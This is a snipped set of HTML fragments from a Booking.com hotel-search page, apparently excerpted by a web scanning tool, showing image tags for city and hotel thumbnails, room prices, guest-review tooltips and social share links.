<img id="globe" src="http://s.bstatic.com/static/img/experiments/logo-full.png" width="116" height="119" alt="Book your hotel now!" />


<img id="logo_nobg" src="http://s.bstatic.com/static/img/b25logo/woordmerk.png" width="222" height="25" alt="Booking.com online hotel reservations" />


<img id="tagline" src="http://r.bstatic.com/static/img/b25logo/tagline_us.png" width="186" height="15" alt="a priceline company" />


<style>
...[SNIP]...
<div id="homein" style="padding-right:1.3em;">

<img src="http://s.bstatic.com/static/img/transparent.png" class="placeholder" alt="" />
<h3 class="firsth3">
...[SNIP]...
<a class="calendar inlineJsRequired calendarLink" href="#checkin_year_month" rel="checkin_year_month"><img align="absbottom" src="http://s.bstatic.com/static/img/transparent.png" width="21" height="18" alt="calendar" title="Open calendar and pick a date" class="icon_calendar use_sprites" /></a>
...[SNIP]...
<div id="homeout">
<img src="http://s.bstatic.com/static/img/transparent.png" class="placeholder" alt="" />
<h3 class="firsth3">
...[SNIP]...
<a class="calendar inlineJsRequired calendarLink" href="#checkout_year_month" rel="checkout_year_month"><img align="absbottom" src="http://s.bstatic.com/static/img/transparent.png" width="21" height="18" alt="calendar" title="Open calendar and pick a date" class="icon_calendar use_sprites" /></a>
...[SNIP]...
<a class="thumblink" href="/city/us/san-diego.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;city=20015725" style="text-decoration: none !important;">
<img src="http://q.bstatic.com/static/img/city/20015725/100x100.jpg" align="left" alt="San Diego U.S.A. Hotels" title="Hotels in San Diego, U.S.A." width="100" height="100" />
</a>
...[SNIP]...
<a href="/city/us/san-diego.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;city=20015725"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<a class="thumblink" href="/city/fr/paris.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;city=-1456928" style="text-decoration: none !important;">
<img src="http://q.bstatic.com/static/img/city/-1456928/100x100.jpg" align="left" alt="Paris France Hotels" title="Hotels in Paris, France" width="100" height="100" />
</a>
...[SNIP]...
<a href="/city/fr/paris.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;city=-1456928"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<a class="thumblink" href="/city/us/los-angeles.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;city=20014181" style="text-decoration: none !important;">
<img src="http://s.bstatic.com/static/img/city/20014181/100x100.jpg" align="left" alt="Los Angeles U.S.A. Hotels" title="Hotels in Los Angeles, U.S.A." width="100" height="100" />
</a>
...[SNIP]...
<a href="/city/us/los-angeles.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;city=20014181"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<a class="thumblink" href="/city/it/rome.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;city=-126693" style="text-decoration: none !important;">
<img src="http://s.bstatic.com/static/img/city/-126693/100x100.jpg" align="left" alt="Rome Italy Hotels" title="Hotels in Rome, Italy" width="100" height="100" />
</a>
...[SNIP]...
<a href="/city/it/rome.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;city=-126693"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<a class="thumblink" href="/city/us/washington.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;city=20021296" style="text-decoration: none !important;">
<img src="http://s.bstatic.com/static/img/city/20021296/100x100.jpg" align="left" alt="Washington U.S.A. Hotels" title="Hotels in Washington, U.S.A." width="100" height="100" />
</a>
...[SNIP]...
<a href="/city/us/washington.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;city=20021296"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<a class="thumblink" href="/city/us/orlando.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;city=20023488" style="text-decoration: none !important;">
<img src="http://r.bstatic.com/static/img/city/20023488/100x100.jpg" align="left" alt="Orlando U.S.A. Hotels" title="Hotels in Orlando, U.S.A." width="100" height="100" />
</a>
...[SNIP]...
<a href="/city/us/orlando.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;city=20023488"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<a class="thumblink" href="/city/gb/london.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;city=-2601889" style="text-decoration: none !important;">
<img src="http://q.bstatic.com/static/img/city/-2601889/100x100.jpg" align="left" alt="London United Kingdom Hotels" title="Hotels in London, United Kingdom" width="100" height="100" />
</a>
...[SNIP]...
<a href="/city/gb/london.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;city=-2601889"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<a class="thumblink" href="/city/us/boston.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;city=20061717" style="text-decoration: none !important;">
<img src="http://r.bstatic.com/static/img/city/20061717/100x100.jpg" align="left" alt="Boston U.S.A. Hotels" title="Hotels in Boston, U.S.A." width="100" height="100" />
</a>
...[SNIP]...
<a href="/city/us/boston.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;city=20061717"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
</h3>

<img id="trans_map" src="http://s.bstatic.com/static/img/trans30.gif" alt="worldmap" usemap="#world_map" width="445" height="214"/>
<map id="world_map" name="world_map">
...[SNIP]...
<h2 style="padding-right:120px; margin:0; line-height: 160%;">Save 50% or more with Flash Deals&nbsp;<img id="newsHelp" src="http://r.bstatic.com/static/img/info.png" alt="" class="jq_tooltip" rel="300" title="Subscribe to get selected hotels at half price or less." style="cursor: help;" /></h2>
...[SNIP]...
<h3>Booking.com is a <a href="http://www.priceline.com/">Priceline</a>
...[SNIP]...
<p><a href="http://www.priceline.com/"><img src="http://s.bstatic.com/static/img/experiments/priceline-usp.gif" alt="" /></a>
...[SNIP]...
<span class="number_reviews">From <a href="http://www.reviewcentre.com/reviews-all-195173.html" target="_blank">1710 reviews</a>
...[SNIP]...
rmal; text-decoration: none; font-size: 1.5em;"
href="/hotel/us/c-boston-massachusettes.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101"
class="hotel_history_lnk">

<img

style="display: block; border: 5px solid white !important; margin-right: 10px; margin-bottom: 10px"

class="thumb jq_tooltippex"
src="http://r.bstatic.com/images/hotel/square60/127/1278290.jpg"
width="60"
height="60"
title="&lt;img src='http://s.bstatic.com/images/hotel/max300/127/1278290.jpg' /&gt;&lt;br&gt;&lt;strong&gt;Hotel Commonwealth&lt;/strong&gt;"
alt="hotel Hotel Commonwealth"
/>
Hotel Commonwealth</a>
...[SNIP]...
</em>


&nbsp;<img style="cursor: help" rel="300" class="jq_tooltip use_sprites icon_minibubble" src="http://s.bstatic.com/static/img/transparent.png" alt="" title="&ldquo;We very much enjoyed our stay. Liked the location to ballpark, and other things. Rooms were excellent, specially like the size of our bathroom. Staff was very helpfull, and nice. We would stay again it was that enjoyable. Thank you ! Rena&bdquo;<br /><br/><img align='left' src=http://r.bstatic.com/static/img/miniperson.gif alt='' />&nbsp;<em style='font-size: 94%'>Rena, Bangor, U.S.A.&nbsp;<img src='http://s.bstatic.com/static/img/flags/16/us.png' alt='' /></em>" />


</span>
...[SNIP]...
<span class="vhsoldout" style="font-size: .88em">
<img src="http://s.bstatic.com/static/img/icons/warning.gif" alt="Sold out!" />
<strong>
...[SNIP]...
<a href="/hotel/us/c-boston-massachusettes.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
weight: normal; text-decoration: none; font-size: 1.5em;"
href="/hotel/us/copley-square.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101"
class="hotel_history_lnk">

<img

style="display: block; border: 5px solid white !important; margin-right: 10px; margin-bottom: 10px"

class="thumb jq_tooltippex"
src="http://q.bstatic.com/images/hotel/square60/169/1691256.jpg"
width="60"
height="60"
title="&lt;img src='http://r.bstatic.com/images/hotel/max300/169/1691256.jpg' /&gt;&lt;br&gt;&lt;strong&gt;Copley Square Hotel&lt;/strong&gt;"
alt="hotel Copley Square Hotel"
/>
Copley Square Hotel</a>
...[SNIP]...
</em>


&nbsp;<img style="cursor: help" rel="300" class="jq_tooltip use_sprites icon_minibubble" src="http://s.bstatic.com/static/img/transparent.png" alt="" title="&ldquo;Attractively appointed, efficient, professional and well-located.

&bdquo;<br /><br/><img align='left' src=http://r.bstatic.com/static/img/miniperson.gif alt='' />&nbsp;<em style='font-size: 94%'>Douglas, Harrison, U.S.A.&nbsp;<img src='http://s.bstatic.com/static/img/flags/16/us.png' alt='' /></em>" />



</span>
...[SNIP]...
<span class="vhsoldout" style="font-size: .88em">
<img src="http://s.bstatic.com/static/img/icons/warning.gif" alt="Sold out!" />
<strong>
...[SNIP]...
<a href="/hotel/us/copley-square.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
</p>


<a id="share_hotel_history_fb" target="_blank" class="share_hotel_history_link jq_tooltip" href="http://www.facebook.com/share.php?u=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Fss%3Did%3A59554%2C56255%26si%3Dho%26label%3Dsocnet_fb_hh_sh%26aid%3D339528" title="Share these hotels on Facebook." name="Share these hotels on Facebook."><img id="share_hotel_history_fb_img" class="use_sprites icon_social_media_fb" src="http://s.bstatic.com/static/img/transparent.png" /></a>

<a id="share_hotel_history_t" class="share_hotel_history_link jq_tooltip share_t" target="_blank" href="http://twitter.com/intent/tweet?text=Help! Which hotel is best?" title="Share these hotels on Twitter." data-shorturl="http://www.booking.com/searchresults.html?ss=id:59554,56255&si=ho&label=socnet_t_hh_sh&aid=339529" name="Share these hotels on Twitter."><img id="share_hotel_history_t_img" class="use_sprites icon_social_media_twitter" src="http://s.bstatic.com/static/img/transparent.png" /></a>
...[SNIP]...
ca101;tmpl=mailafriend_standalone;url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Fss%3Did%3A59554%2C56255%26si%3Dho%3Blabel%3Dsocnet_maf_hh_sh%3Baid%3D339530;title=Booking.com: Welcome;notes="><img class="use_sprites icon_social_media_mailafriend" src="http://s.bstatic.com/static/img/transparent.png" /></a>
...[SNIP]...
<td class="c1thumb">


<img width="40" height="40" src="http://s.bstatic.com/images/hotel/square40/310/3102983.jpg" alt="" class="jq_tooltippex" title="<img src='http://r.bstatic.com/images/hotel/max300/310/3102983.jpg' /><br /><strong>Flatotel, New York</strong>" />

</td>
...[SNIP]...
<span class="cheapest">


<img src="http://q.bstatic.com/static/img/room_double_mini.gif" alt="Double US$ 773.50" /> Double US$ 773.50

<span class="separator">
...[SNIP]...
</span>


<img src="http://s.bstatic.com/static/img/room_group_mini.gif" alt="Group US$ 1079.50" /> Group US$ 1079.50


</span>
...[SNIP]...
</em>


&nbsp;<img style="cursor: help" rel="300" class="jq_tooltip use_sprites icon_minibubble" src="http://s.bstatic.com/static/img/transparent.png" alt="" title="&ldquo;The room was perfect for us.&bdquo;<br /><br/><img align='left' src=http://r.bstatic.com/static/img/miniperson.gif alt='' />&nbsp;<em style='font-size: 94%'>Omar, Toronto, Canada&nbsp;<img src='http://r.bstatic.com/static/img/flags/16/ca.png' alt='' /></em>" />


</span>
...[SNIP]...
<a href="/hotel/us/flatotel-new-york.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<td class="c1thumb">


<img width="40" height="40" src="http://r.bstatic.com/images/hotel/square40/387/3871612.jpg" alt="" class="jq_tooltippex" title="<img src='http://q.bstatic.com/images/hotel/max300/387/3871612.jpg' /><br /><strong>Trump International New York, New York</strong>" />

</td>
...[SNIP]...
<span class="cheapest">


<img src="http://q.bstatic.com/static/img/room_triple_mini.gif" alt="Triple US$ 1790" /> Triple US$ 1790

<span class="separator">
...[SNIP]...
</span>


<img src="http://s.bstatic.com/static/img/room_group_mini.gif" alt="Group US$ 1990" /> Group US$ 1990


</span>
...[SNIP]...
</em>


&nbsp;<img style="cursor: help" rel="300" class="jq_tooltip use_sprites icon_minibubble" src="http://s.bstatic.com/static/img/transparent.png" alt="" title="&ldquo;Good attentivness by the staff and the great location

The bedrooms are very luxurious&bdquo;<br /><br/><img align='left' src=http://r.bstatic.com/static/img/miniperson.gif alt='' />&nbsp;<em style='font-size: 94%'>Gary, bushey heath, United Kingdom&nbsp;<img src='http://q.bstatic.com/static/img/flags/16/gb.png' alt='' /></em>" />



</span>
...[SNIP]...
<a href="/hotel/us/trump-international-new-york.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<td class="c1thumb">


<img width="40" height="40" src="http://s.bstatic.com/images/hotel/square40/296/2968916.jpg" alt="" class="jq_tooltippex" title="<img src='http://s.bstatic.com/images/hotel/max300/296/2968916.jpg' /><br /><strong>Jumeirah Essex House, New York</strong>" />

</td>
...[SNIP]...
<span class="cheapest">


<img src="http://q.bstatic.com/static/img/room_double_mini.gif" alt="Double US$ 888" /> Double US$ 888


</span>
...[SNIP]...
</em>


&nbsp;<img style="cursor: help" rel="300" class="jq_tooltip use_sprites icon_minibubble" src="http://s.bstatic.com/static/img/transparent.png" alt="" title="&ldquo;The location of this hotel can&#39;t be beat in NYC. Situated on Central Park South it is within walking distance of many must see sights, including Columbus Square, Times Square, Rockefeller Plaza/NBC 30 Rock,...&bdquo;<br /><br/><img align='left' src=http://r.bstatic.com/static/img/miniperson.gif alt='' />&nbsp;<em style='font-size: 94%'>Alessa, Pacifica, U.S.A.&nbsp;<img src='http://s.bstatic.com/static/img/flags/16/us.png' alt='' /></em>" />


</span>
...[SNIP]...
<a href="/hotel/us/j-e-house-new-york-new-york.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<td class="c1thumb">


<img width="40" height="40" src="http://r.bstatic.com/images/hotel/square40/230/2307521.jpg" alt="" class="jq_tooltippex" title="<img src='http://q.bstatic.com/images/hotel/max300/230/2307521.jpg' /><br /><strong>Holiday Inn Manhattan Sixth Avenue, New York</strong>" />

</td>
...[SNIP]...
<span class="cheapest">


<img src="http://q.bstatic.com/static/img/room_double_mini.gif" alt="Double US$ 798" /> Double US$ 798

<span class="separator">
...[SNIP]...
</span>


<img src="http://q.bstatic.com/static/img/room_triple_mini.gif" alt="Triple US$ 838" /> Triple US$ 838


</span>
...[SNIP]...
</em>


&nbsp;<img style="cursor: help" rel="300" class="jq_tooltip use_sprites icon_minibubble" src="http://s.bstatic.com/static/img/transparent.png" alt="" title="&ldquo;The staff was friendly and efficient. The location was excellent.

&bdquo;<br /><br/><img align='left' src=http://r.bstatic.com/static/img/miniperson.gif alt='' />&nbsp;<em style='font-size: 94%'>Henry, Tel Aviv, Israel&nbsp;<img src='http://q.bstatic.com/static/img/flags/16/il.png' alt='' /></em>" />



</span>
...[SNIP]...
<a href="/hotel/us/manhattan-sixth-avenue.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<td class="c1thumb">


<img width="40" height="40" src="http://q.bstatic.com/images/hotel/square40/385/3857354.jpg" alt="" class="jq_tooltippex" title="<img src='http://s.bstatic.com/images/hotel/max300/385/3857354.jpg' /><br /><strong>Hilton New York, New York</strong>" />

</td>
...[SNIP]...
<span class="cheapest">


<img src="http://s.bstatic.com/static/img/room_single_mini.gif" alt="Single US$ 758" /> Single US$ 758

<span class="separator">
...[SNIP]...
</span>


<img src="http://q.bstatic.com/static/img/room_double_mini.gif" alt="Double US$ 818" /> Double US$ 818

<span class="separator">
...[SNIP]...
</span>


<img src="http://s.bstatic.com/static/img/room_group_mini.gif" alt="Group US$ 918" /> Group US$ 918


</span>
...[SNIP]...
</em>


&nbsp;<img style="cursor: help" rel="300" class="jq_tooltip use_sprites icon_minibubble" src="http://s.bstatic.com/static/img/transparent.png" alt="" title="&ldquo;Besides the high quality service we received we really enjoyed having a full American breakfast each morning to start our day.&bdquo;<br /><br/><img align='left' src=http://r.bstatic.com/static/img/miniperson.gif alt='' />&nbsp;<em style='font-size: 94%'>Teresa, Kihei, U.S.A.&nbsp;<img src='http://s.bstatic.com/static/img/flags/16/us.png' alt='' /></em>" />


</span>
...[SNIP]...
<a href="/hotel/us/hilton-new-york.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<td class="c1thumb">


<img width="40" height="40" src="http://r.bstatic.com/images/hotel/square40/259/2594396.jpg" alt="" class="jq_tooltippex" title="<img src='http://q.bstatic.com/images/hotel/max300/259/2594396.jpg' /><br /><strong>Planet Hollywood Towers, Las Vegas</strong>" />

</td>
...[SNIP]...
<span class="cheapest">


<img src="http://q.bstatic.com/static/img/room_double_mini.gif" alt="Double US$ 1038" /> Double US$ 1038

<span class="separator">
...[SNIP]...
</span>


<img src="http://s.bstatic.com/static/img/room_group_mini.gif" alt="Group US$ 1488" /> Group US$ 1488


</span>
...[SNIP]...
</em>


&nbsp;<img style="cursor: help" rel="300" class="jq_tooltip use_sprites icon_minibubble" src="http://s.bstatic.com/static/img/transparent.png" alt="" title="&ldquo;Easy access to the strip and shopping, right in the centre of Las Vegas.
Loved the grand canyon helicopter tour, worth every penny.

&bdquo;<br /><br/><img align='left' src=http://r.bstatic.com/static/img/miniperson.gif alt='' />&nbsp;<em style='font-size: 94%'>Gina, North Chailey, United Kingdom&nbsp;<img src='http://q.bstatic.com/static/img/flags/16/gb.png' alt='' /></em>" />



</span>
...[SNIP]...
<a href="/hotel/us/ph-towers.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<td class="c1thumb">


<img width="40" height="40" src="http://q.bstatic.com/images/hotel/square40/324/3247493.jpg" alt="" class="jq_tooltippex" title="<img src='http://s.bstatic.com/images/hotel/max300/324/3247493.jpg' /><br /><strong>The Cosmopolitan of Las Vegas, Las Vegas</strong>" />

</td>
...[SNIP]...
<span class="cheapest">


<img src="http://q.bstatic.com/static/img/room_double_mini.gif" alt="Double US$ 725" /> Double US$ 725


</span>
...[SNIP]...
</em>


&nbsp;<img style="cursor: help" rel="300" class="jq_tooltip use_sprites icon_minibubble" src="http://s.bstatic.com/static/img/transparent.png" alt="" title="&ldquo;The room was amazing. Very stylish and sexy. A great place to recover from a Vegas hang over.&bdquo;<br /><br/><img align='left' src=http://r.bstatic.com/static/img/miniperson.gif alt='' />&nbsp;<em style='font-size: 94%'>Meredith, Austin, TX, U.S.A.&nbsp;<img src='http://s.bstatic.com/static/img/flags/16/us.png' alt='' /></em>" />


</span>
...[SNIP]...
<a href="/hotel/us/the-cosmopolitan-of-las-vegas.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<td class="c1thumb">


<img width="40" height="40" src="http://s.bstatic.com/images/hotel/square40/222/2222526.jpg" alt="" class="jq_tooltippex" title="<img src='http://s.bstatic.com/images/hotel/max300/222/2222526.jpg' /><br /><strong>Hard Rock Hotel and Casino, Las Vegas</strong>" />

</td>
...[SNIP]...
<span class="cheapest">


<img src="http://q.bstatic.com/static/img/room_double_mini.gif" alt="Double US$ 748" /> Double US$ 748


</span>
...[SNIP]...
</em>


&nbsp;<img style="cursor: help" rel="300" class="jq_tooltip use_sprites icon_minibubble" src="http://s.bstatic.com/static/img/transparent.png" alt="" title="&ldquo;i loved the staff and how they made my stay very enjoyable. from the front desk to the bartenders even busers. this was my first time visitn vegas and the hard rock and casino was the best choice for my stay.&bdquo;<br /><br/><img align='left' src=http://r.bstatic.com/static/img/miniperson.gif alt='' />&nbsp;<em style='font-size: 94%'>Asia, newington, U.S.A.&nbsp;<img src='http://s.bstatic.com/static/img/flags/16/us.png' alt='' /></em>" />


</span>
...[SNIP]...
<a href="/hotel/us/hard-rock-and-casino.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<td class="c1thumb">


<img width="40" height="40" src="http://q.bstatic.com/images/hotel/square40/214/2140804.jpg" alt="" class="jq_tooltippex" title="<img src='http://s.bstatic.com/images/hotel/max300/214/2140804.jpg' /><br /><strong>Desert Club Resort, Las Vegas</strong>" />

</td>
...[SNIP]...
<span class="cheapest">


<img src="http://s.bstatic.com/static/img/room_group_mini.gif" alt="Group US$ 258" /> Group US$ 258


</span>
...[SNIP]...
</em>


&nbsp;<img style="cursor: help" rel="300" class="jq_tooltip use_sprites icon_minibubble" src="http://s.bstatic.com/static/img/transparent.png" alt="" title="&ldquo;I think the best part of our stay was the staff, they were all very helpful and happy to please. Staff like this make any stay enjoyable.&bdquo;<br /><br/><img align='left' src=http://r.bstatic.com/static/img/miniperson.gif alt='' />&nbsp;<em style='font-size: 94%'>Geraldine, Cairnlea, Australia&nbsp;<img src='http://q.bstatic.com/static/img/flags/16/au.png' alt='' /></em>" />


</span>
...[SNIP]...
<a href="/hotel/us/s-b-r-las-vegas-nevada.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<td class="c1thumb">


<img width="40" height="40" src="http://q.bstatic.com/images/hotel/square40/145/1458076.jpg" alt="" class="jq_tooltippex" title="<img src='http://s.bstatic.com/images/hotel/max300/145/1458076.jpg' /><br /><strong>The Venetian Resort-Hotel-Casino, Las Vegas</strong>" />

</td>
...[SNIP]...
<span class="cheapest">


<img src="http://q.bstatic.com/static/img/room_double_mini.gif" alt="Double US$ 658" /> Double US$ 658


</span>
...[SNIP]...
</em>


&nbsp;<img style="cursor: help" rel="300" class="jq_tooltip use_sprites icon_minibubble" src="http://s.bstatic.com/static/img/transparent.png" alt="" title="&ldquo;everything. design, swimming polls are breathtaking, shopping areas are beautiful. suite was also amazing. i was so sad when i had to leave i decided i had to return soon. also saw other hotels in vegas but definitely will stay always at the venetian.&bdquo;<br /><br/><img align='left' src=http://r.bstatic.com/static/img/miniperson.gif alt='' />&nbsp;<em style='font-size: 94%'>Claudia, birmingham, United Kingdom&nbsp;<img src='http://q.bstatic.com/static/img/flags/16/gb.png' alt='' /></em>" />


</span>
...[SNIP]...
<a href="/hotel/us/the-venetian-resort-casino.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<!-- end usersOnPage.inc -->


<img align="left" src="http://q.bstatic.com/static/img/popular_small.gif" alt="" />&nbsp;


There are 14 people looking at this hotel.
</span>
...[SNIP]...
<td class="c1thumb">


<img width="40" height="40" src="http://r.bstatic.com/images/hotel/square40/507/5074544.jpg" alt="" class="jq_tooltippex" title="<img src='http://q.bstatic.com/images/hotel/max300/507/5074544.jpg' /><br /><strong>The Regency Inn San Francisco, San Francisco</strong>" />

</td>
...[SNIP]...
<span class="cheapest">


<img src="http://q.bstatic.com/static/img/room_double_mini.gif" alt="Double US$ 438" /> Double US$ 438


</span>
...[SNIP]...
</em>


&nbsp;<img style="cursor: help" rel="300" class="jq_tooltip use_sprites icon_minibubble" src="http://s.bstatic.com/static/img/transparent.png" alt="" title="&ldquo;The Hotel was very nice, not the most luxurious I&amp;#39;ve stayed in but it was very clean and the staff were exceptionally helpful. There is a laundromat around the corner and it&amp;#39;s reaonably priced if you wish to use it.&bdquo;<br /><br/><img align='left' src=http://r.bstatic.com/static/img/miniperson.gif alt='' />&nbsp;<em style='font-size: 94%'>Morgan, Northop, U.S.A.&nbsp;<img src='http://s.bstatic.com/static/img/flags/16/us.png' alt='' /></em>" />


</span>
...[SNIP]...
<a href="/hotel/us/san-francisco-587-eddy-street.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<td class="c1thumb">


<img width="40" height="40" src="http://s.bstatic.com/images/hotel/square40/851/851307.jpg" alt="" class="jq_tooltippex" title="<img src='http://r.bstatic.com/images/hotel/max300/851/851307.jpg' /><br /><strong>Civic Center Motor Inn, San Francisco</strong>" />

</td>
...[SNIP]...
<span class="cheapest">


<img src="http://q.bstatic.com/static/img/room_double_mini.gif" alt="Double US$ 398" /> Double US$ 398

<span class="separator">
...[SNIP]...
</span>


<img src="http://s.bstatic.com/static/img/room_group_mini.gif" alt="Group US$ 458" /> Group US$ 458


</span>
...[SNIP]...
</em>


&nbsp;<img style="cursor: help" rel="300" class="jq_tooltip use_sprites icon_minibubble" src="http://s.bstatic.com/static/img/transparent.png" alt="" title="&ldquo;Cheap, good rooms with connected balconies so you can meet fellow travellers. Good location. No complaints.&bdquo;<br /><br/><img align='left' src=http://r.bstatic.com/static/img/miniperson.gif alt='' />&nbsp;<em style='font-size: 94%'>Andrew, Calgary, Canada&nbsp;<img src='http://r.bstatic.com/static/img/flags/16/ca.png' alt='' /></em>" />


</span>
...[SNIP]...
<a href="/hotel/us/best-western-civic-center-motor-inn.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<td class="c1thumb">


<img width="40" height="40" src="http://r.bstatic.com/images/hotel/square40/530/5303765.jpg" alt="" class="jq_tooltippex" title="<img src='http://r.bstatic.com/images/hotel/max300/530/5303765.jpg' /><br /><strong>America&#39;s Best Inn - Fisherman&#39;s Wharf, San Francisco</strong>" />

</td>
...[SNIP]...
<span class="cheapest">


<img src="http://q.bstatic.com/static/img/room_double_mini.gif" alt="Double US$ 488" /> Double US$ 488


</span>
...[SNIP]...
</em>


&nbsp;<img style="cursor: help" rel="300" class="jq_tooltip use_sprites icon_minibubble" src="http://s.bstatic.com/static/img/transparent.png" alt="" title="&ldquo;Staff was amazing, hotel is reasonably clean.
The location is great - the bus stop is 1 min away - going in every direction you might need.
Free parking for our car.
Free internet.&bdquo;<br /><br/><img align='left' src=http://r.bstatic.com/static/img/miniperson.gif alt='' />&nbsp;<em style='font-size: 94%'>Leona, Ottawa, Canada&nbsp;<img src='http://r.bstatic.com/static/img/flags/16/ca.png' alt='' /></em>" />



</span>
...[SNIP]...
<a href="/hotel/us/america-s-best-inn-fisherman-s-wharf.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<td class="c1thumb">


<img width="40" height="40" src="http://r.bstatic.com/images/hotel/square40/283/2838303.jpg" alt="" class="jq_tooltippex" title="<img src='http://q.bstatic.com/images/hotel/max300/283/2838303.jpg' /><br /><strong>Travelodge Golden Gate, San Francisco</strong>" />

</td>
...[SNIP]...
<span class="cheapest">


<img src="http://q.bstatic.com/static/img/room_double_mini.gif" alt="Double US$ 318" /> Double US$ 318


</span>
...[SNIP]...
</em>


&nbsp;<img style="cursor: help" rel="300" class="jq_tooltip use_sprites icon_minibubble" src="http://s.bstatic.com/static/img/transparent.png" alt="" title="&ldquo;Close to bus stop which got me to Golden Gate Park fairly easily.&bdquo;<br /><br/><img align='left' src=http://r.bstatic.com/static/img/miniperson.gif alt='' />&nbsp;<em style='font-size: 94%'>Lauren, santa monica, U.S.A.&nbsp;<img src='http://s.bstatic.com/static/img/flags/16/us.png' alt='' /></em>" />


</span>
...[SNIP]...
<a href="/hotel/us/travelodge-golden-gate.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
